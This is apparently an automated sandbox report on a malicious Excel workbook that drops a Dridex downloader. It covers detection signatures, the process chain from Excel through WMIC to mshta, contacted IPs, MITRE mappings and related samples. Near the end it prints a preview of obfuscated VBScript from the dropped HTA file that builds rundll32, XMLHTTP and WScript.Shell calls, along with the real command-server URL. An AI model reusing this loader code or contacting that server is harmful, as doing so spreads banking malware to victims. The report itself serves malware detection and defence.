Loading ...

Play interactive tourEdit tour

Windows Analysis Report payment8642156.xlsb

Overview

General Information

Sample Name:payment8642156.xlsb
Analysis ID:528108
MD5:c0ba3e41c19da601eb852e9cd468012b
SHA1:151cad874dce5400b1cdb1a4f6114c296311f76a
SHA256:56e7b2005961a0726ac94e50ed03bfcad15700e3aee1be840ee2b827f7798680
Tags:xlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1868 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 1464 cmdline: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 2068 cmdline: mshta C:\ProgramData\XgQXeAWeoOU.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\XgQXeAWeoOU.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1868, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", ProcessId: 1464
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1868, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", ProcessId: 1464

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
      Source: Joe Sandbox ViewIP Address: 132.148.135.183 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.688084354.0000000003A70000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.469582354.0000000001B30000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.688084354.0000000003A70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32440B49.pngJump to behavior
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\XgQXeAWeoOU.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: payment8642156.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: payment8642156.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.469501112.0000000000200000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 MacroShow sources
      Source: payment8642156.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 56
      Source: payment8642156.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\XgQXeAWeoOU.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$payment8642156.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF890.tmpJump to behavior
      Source: classification engineClassification label: mal84.troj.expl.evad.winXLSB@4/7@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: payment8642156.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: payment8642156.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: payment8642156.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: 5E36.tmp.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: 5E36.tmp.0.drInitial sample: OLE zip file path = xl/media/image2.png
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: xgqxeaweoou.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: xgqxeaweoou.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1280Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\System32\mshta.exe TID: 2624Thread sleep time: -60000s >= -30000s
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.687216819.0000000001040000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.687216819.0000000001040000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.687216819.0000000001040000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      payment8642156.xlsb9%ReversingLabsScript-WScript.Malware.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%VirustotalBrowse
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDGfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.688084354.0000000003A70000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.688084354.0000000003A70000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.687793650.0000000003877000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.469582354.0000000001B30000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.687594658.0000000003690000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    132.148.135.183
                    unknownUnited States
                    398101GO-DADDY-COM-LLCUSfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528108
                    Start date:24.11.2021
                    Start time:19:06:54
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 27s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:payment8642156.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal84.troj.expl.evad.winXLSB@4/7@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    19:07:47API Interceptor11x Sleep call for process: WMIC.exe modified
                    19:07:48API Interceptor446x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    132.148.135.183Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    request-377185.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Offer-04563360.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    vote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    vote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Offer 39052.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    GO-DADDY-COM-LLCUSNetflix coupon040693525.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    request-377185.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Offer-04563360.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    vote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    vote0882037.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    subscription-673890410.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Offer 39052.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                    • 184.168.98.97
                    Euro invoice.exeGet hashmaliciousBrowse
                    • 148.66.138.164
                    New Order778880.exeGet hashmaliciousBrowse
                    • 173.201.188.238
                    c0az1l4js3001lsk4xd9n.x86-20211124-0850Get hashmaliciousBrowse
                    • 192.169.147.26
                    Euro invoice.exeGet hashmaliciousBrowse
                    • 148.66.138.164
                    8pTiccdV2s.exeGet hashmaliciousBrowse
                    • 69.64.47.51
                    DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                    • 184.168.96.165

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\XgQXeAWeoOU.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):5037
                    Entropy (8bit):5.071339310661895
                    Encrypted:false
                    SSDEEP:96:UXZtsxeY/Z7R6d23YPsrILRpc+mTwgbfb+aDW/Cd3pNy:UbsxeY/Z7R6d23YGGpc+mTLQCd5g
                    MD5:3D6252D037CD3E30A4D97EADB9D3130E
                    SHA1:9C114500A3A22C0727E77E010845E1F0549F727D
                    SHA-256:6DF7D89ACBD338A4BFE1935484EB346EB9238828F247DE4BE33D4C80370E90FC
                    SHA-512:8EFED1A790D9C4808282C9BD05AE45F328A27AE780B69EAB0D4525DEB3591D6C3DC98F954A01B98A49F267D227B18A26AD3435E91F9DC9BD4677EF9CAFB4C973
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\XgQXeAWeoOU.rtf, Author: Joe Security
                    Reputation:low
                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..A_O_P_Z_M_p_l_D_b_F_R_c_O_l = Chr(114+1-1) & "un" & "" & "dll" & "32" & ".e" & Chr(120+1-1) & "e " & "C:" & "\\P" & "" & "ro" & "gra" & "mDa" & Chr(116+1-1) & "a\" & "" & "tn" & "igg" & "er." & "bi" & Chr(110+1-1) & " Dl" & Chr(108+1-1) & "Re" & Chr(103+1-1) & "is" & "te" & Chr(114+1-1) & "Se" & "rve" & Chr(114+1-1)..Set X_t_z_c_Q_r_q_k_N_a_u_z_c_j = CreateObject("MS" & Chr(88+1-1) & "" & "ML2" & Chr(46+1-1) & Chr(83+1-1) & "erv" & "er" & "" & "XML" & "HTT" & Chr(80+1-1) & "" & ".6." & "" & Chr(48+1-1))....y_e_Y_W_L_J_p_v_I_G_L_O_n_f = Chr(87+1-1) & Chr(115+1-1) & "" & "" & "" & "" & "" & "cr" & Chr(105+1-1) & "pt" & Chr(46+1-1) & "" & "She" & Chr(108+1-1) & Chr(108+1-1)..Set Y_T_P_F_W_y_g_n_a_b_V_s_G = CreateObject(y_e_Y_W_L_J_p_v_I_G_L_O_
                    C:\ProgramData\pXJSNz.txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):154
                    Entropy (8bit):4.495777143763227
                    Encrypted:false
                    SSDEEP:3:YBLHMJMKJMPoALGVcH2HJiVRM/GJ9MmLMXkaok1YtA7JQ3KkphABkFGKih2:Y9oMKCPoQ2HJEJ9LLhazaA7J4GkFGKiM
                    MD5:EF774E3B80A3100B0F554661D031479C
                    SHA1:6EB1AFBF3175139C1B5CC9A4020E646F0EE8ECA2
